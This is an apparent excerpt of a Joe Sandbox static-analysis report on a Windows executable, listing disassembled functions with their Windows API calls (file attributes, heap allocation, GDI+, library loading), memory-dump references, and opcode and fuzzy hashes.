                • Opcode ID: 8c1d51388dd124cbf731944f82c6de41a90b109936a8735c2745880cc3a55288
                • Instruction ID: 29fd2262b8df3f736b9d235c133f5fedbb86e4239b719b70bc8a722d4fe151e9
                • Opcode Fuzzy Hash: 8c1d51388dd124cbf731944f82c6de41a90b109936a8735c2745880cc3a55288
                • Instruction Fuzzy Hash: 682104B0510749EED7308F25C895BA7B7E8EB49768F00492FF5E5C2391C378AC498A65
                Function 004D9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                Download Yara Rule
                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004D7547,?,?,?,?), ref: 004D9D7C
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 004D9E2C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: 92e883be7a0e1a0b4afbf81689d7c73ccdfc7d9dc37b06abfc6446ee871350ec
                • Instruction ID: cd3e26a246e111e3eb5316f92543573deaadf1562abcec3719d11cb423820778
                • Opcode Fuzzy Hash: 92e883be7a0e1a0b4afbf81689d7c73ccdfc7d9dc37b06abfc6446ee871350ec
                • Instruction Fuzzy Hash: B721A231158286ABC714DE65C461AABBBE5AF56708F08081FB8D1C7341D32DEE0CDB61
                Function 004FA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 004FA4B8
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004FA4C5
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: 5bed37f866c6bf78326f23532bdfd7d19a082af0e5b7d40c7f87d98a82f98f16
                • Instruction ID: 80609769e79b43dff9831378296034ff862ba7e3dfc344cca79d31a639aabc0c
                • Opcode Fuzzy Hash: 5bed37f866c6bf78326f23532bdfd7d19a082af0e5b7d40c7f87d98a82f98f16
                • Instruction Fuzzy Hash: 13117673A001289BDB26DF28FC4587F7391AB803207164222FE08AB344EB38EC11D3D6
                Function 004D9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                Download Yara Rule
                APIs
                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,004D9B35,?,?,00000000,?,?,004D8D9C,?), ref: 004D9BC0
                • GetLastError.KERNEL32 ref: 004D9BCD
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 5e9e40bbbe86136559257fb8ca92c91bbeb093e8854a53e0ebdeeb3857b22b66
                • Instruction ID: 9ddba4cc2490f9baa1a5f62873ebbd611d7c6f4cf9810df209a736ecabf0c1a6
                • Opcode Fuzzy Hash: 5e9e40bbbe86136559257fb8ca92c91bbeb093e8854a53e0ebdeeb3857b22b66
                • Instruction Fuzzy Hash: 2901E1312042059BCB08CE65ACA496FB399BFC1721B15462FF813C3380CA79AC09AA25
                Function 004D9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                Download Yara Rule
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 004D9E76
                • GetLastError.KERNEL32 ref: 004D9E82
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 71170f41d740bfaabfe7a0dffd5d71100e9ee787fb2cfc9dcccc9bc6faa3865d
                • Instruction ID: 345c8490fb173910cc2b38d67b322cf908d0907aba65c9c3c4b2744da547a773
                • Opcode Fuzzy Hash: 71170f41d740bfaabfe7a0dffd5d71100e9ee787fb2cfc9dcccc9bc6faa3865d
                • Instruction Fuzzy Hash: 19018C713052006BEB349B29D8A8B6BB7D99B89318F144A3FB146C37C0DB79EC888615
                Function 004F8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 004F8627
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00510F50,004DCE57,?,?,?,?,?,?), ref: 004F8663
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Heap$AllocAllocate_free
                • String ID:
                • API String ID: 2447670028-0
                • Opcode ID: 4202c0314ba6318fc3aa55020af3969235366d87fce3f3f62403e7b5f494c683
                • Instruction ID: 33ba0d441bf38abab5de5b112bd8477c4706b8c1e10858e3f932b97207d8b302
                • Opcode Fuzzy Hash: 4202c0314ba6318fc3aa55020af3969235366d87fce3f3f62403e7b5f494c683
                • Instruction Fuzzy Hash: 0EF0C23220151D66EB212A22AC01E7F37589FA1BA4F24411FFB14DE391DF2CC80295AD
                Function 004E0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 004E0915
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 004E091C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 1d71070b8ef9a3e5aa33680e859a5ff99317ea5bc2952cb033328f86f0b1c539
                • Instruction ID: 7d34a1daf6b96cdb55089e3815da2827e15205bdc0dffa50ee47bb5adc2da08b
                • Opcode Fuzzy Hash: 1d71070b8ef9a3e5aa33680e859a5ff99317ea5bc2952cb033328f86f0b1c539
                • Instruction Fuzzy Hash: 9FE09BB2A11145ABFF05CEA59C044BF739DDB14312710417BA816D3202F678DD458668
                Function 004DA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA458
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA489
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 99faae10d4da3dcef537112a7535d3a6f7067f112aaa3c39376831f194517dea
                • Instruction ID: af090540585afa4bd2bed99a06c5684c35f5a48f2a7365fe1c549e894e7c10f7
                • Opcode Fuzzy Hash: 99faae10d4da3dcef537112a7535d3a6f7067f112aaa3c39376831f194517dea
                • Instruction Fuzzy Hash: 3AF0A03124120DBBDF01AF61DC15FDA376CBB04385F048056BC8886261DB7ACAA8AA54
                Function 004ED573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                • Opcode ID: 86677a5e9278c8211cfe56c93e886b20d605fb2ce976af448e24e5600049877e
                • Instruction ID: de01af463fad86cf8fcc440c8067a7cfaed45f6f4e571b4083e7152ed1decb2c
                • Opcode Fuzzy Hash: 86677a5e9278c8211cfe56c93e886b20d605fb2ce976af448e24e5600049877e
                • Instruction Fuzzy Hash: 28F05C319003887BEF11AB728C02FAA371C9B0434EF00096BB600531A1DEB96A249766
                Function 004DA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                Download Yara Rule
                APIs
                • DeleteFileW.KERNELBASE(?,?,?,004D984C,?,?,004D9688,?,?,?,?,00501FA1,000000FF), ref: 004DA13E
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,004D984C,?,?,004D9688,?,?,?,?,00501FA1,000000FF), ref: 004DA16C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 5d318fe17db42c0c7d06b271d6ef7142267d5dd1d0d51a7702ef7a8c120ec6b2
                • Instruction ID: 2a17764499cb8726f3aec52ef0a135990f6cd3339d60004b47c5bc28139e5416
                • Opcode Fuzzy Hash: 5d318fe17db42c0c7d06b271d6ef7142267d5dd1d0d51a7702ef7a8c120ec6b2
                • Instruction Fuzzy Hash: 72E02234241208ABDB00AF21DC15FEE335CAB08382F484067BC88C3260DB61DDA8AA94
                Function 004EA39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,00501FA1,000000FF), ref: 004EA3D1
                • CoUninitialize.COMBASE(?,?,?,?,00501FA1,000000FF), ref: 004EA3D6
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: 116b51c0daab514ea9ed971fe647db6c1ff0e5ca67bc5ab515e1823149f35d95
                • Instruction ID: 5b908a64954268f836f834055168c1645c24affd4254504dde43ff7b364b61c4
                • Opcode Fuzzy Hash: 116b51c0daab514ea9ed971fe647db6c1ff0e5ca67bc5ab515e1823149f35d95
                • Instruction Fuzzy Hash: 34F03972A18A55EFC7109B4DDD05B59FBADFB89B20F04436AF419837A0CB786800CA95
                Function 004DA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,004DA189,?,004D76B2,?,?,?,?), ref: 004DA1A5
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,004DA189,?,004D76B2,?,?,?,?), ref: 004DA1D1
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a12c516a4d96fb7bd9c96b24c51bd5576c69b92c910275a509ed81b0404dad81
                • Instruction ID: 257512fc934478834c23c96d14b70ab4776c135c754b5bc5faf2c96edb3d1bac
                • Opcode Fuzzy Hash: a12c516a4d96fb7bd9c96b24c51bd5576c69b92c910275a509ed81b0404dad81
                • Instruction Fuzzy Hash: FFE06D355001289BDB20AA699C09BDAB75CAB183A2F0042A3BD44E3390DA74DD589AE5
                Function 004E0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                Download Yara Rule
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: 16d7a384cb0633dfe1423c231b701f930afb616022bfddf63e95c8944340530c
                • Instruction ID: 1fa826a89cedcc7fa51fea2c0df33ec965c4942f0e8ab9cc95f5d6cb164ed5dd
                • Opcode Fuzzy Hash: 16d7a384cb0633dfe1423c231b701f930afb616022bfddf63e95c8944340530c
                • Instruction Fuzzy Hash: EEE01B7550215C96DB2196959C09FDA775CEF19392F040496B944D3104D6749A448BE4
                Function 004E9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                Download Yara Rule
                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004E9B30
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004E9B37
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: d313bb865196c6e5c02451f9757f82f62692c767789d0380ff2aedbf4b374562
                • Instruction ID: cf3f64f3d486cc7d70857f8b0bc1157c5fb5eaa07664701d0d05b5d043656d1c
                • Opcode Fuzzy Hash: d313bb865196c6e5c02451f9757f82f62692c767789d0380ff2aedbf4b374562
                • Instruction Fuzzy Hash: E9E0ED71901218EFCB10DF9AD5016AAB7E8EB08322F10809FE99593341E6B56E049B95
                Function 004F215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004F329A: try_get_function.LIBVCRUNTIME ref: 004F32AF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004F217A
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004F2185
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                • Opcode ID: 68ac7f8a6e716c8f27efc60a402007f8b428469291e3a9596e60b9d88f011b59
                • Instruction ID: dfe65f1d857c0958f3afbb85d8c79e5764beb54d34b5c386c58496778c1e2230
                • Opcode Fuzzy Hash: 68ac7f8a6e716c8f27efc60a402007f8b428469291e3a9596e60b9d88f011b59
                • Instruction Fuzzy Hash: E2D0A72510430E2569082AB17B421FA23445851B793F00B4BE720851D1EE9D4005701E
                Function 004EDC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • DloadLock.DELAYIMP ref: 004EDC73
                • DloadProtectSection.DELAYIMP ref: 004EDC8F
                  • Part of subcall function 004EDE67: DloadObtainSection.DELAYIMP ref: 004EDE77
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Dload$Section$LockObtainProtect
                • String ID:
                • API String ID: 731663317-0
                • Opcode ID: fca6e70aab39e38f6690bfdd735102561fb27469de940a16d2372001e711addf
                • Instruction ID: 89fbe8a9030b2a754d20cfc88bb1435d19da58584ceb32eea83b52cf1ef37ab1
                • Opcode Fuzzy Hash: fca6e70aab39e38f6690bfdd735102561fb27469de940a16d2372001e711addf
                • Instruction Fuzzy Hash: 85D0C9709803C44AC211EB169D5A75E6270B72878BF642607A106876E4DBAC4889E60E
                Function 004D12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: 006bfac47e425e40f22b9008b559f517db0d0ed07d3c846a9d6c69e756c0fa3e
                • Instruction ID: 5c27f958fe9aa1e82aa8b30612f0caafd32806c739ec6d2d60a400a4ef3e3344
                • Opcode Fuzzy Hash: 006bfac47e425e40f22b9008b559f517db0d0ed07d3c846a9d6c69e756c0fa3e
                • Instruction Fuzzy Hash: 28C01232058600BECB010BB0ED09D2FBBA8ABA4212F05C908B6A5C0160C238C018EB11
                Function 004D19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: d6e724dcf0f822614cb32649fa8a7f6042be5fe9b20103c1239461128139b7c0
                • Instruction ID: 8992cf215986e5154c55cc652920d3d4af8d219d9ce790ef32d8d6e594db9711
                • Opcode Fuzzy Hash: d6e724dcf0f822614cb32649fa8a7f6042be5fe9b20103c1239461128139b7c0
                • Instruction Fuzzy Hash: A0C1C670A04244AFEF15CF68C4A4BAE7BA5EF06314F0840BBDC45DB3A6DB399944CB65
                Function 004D3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
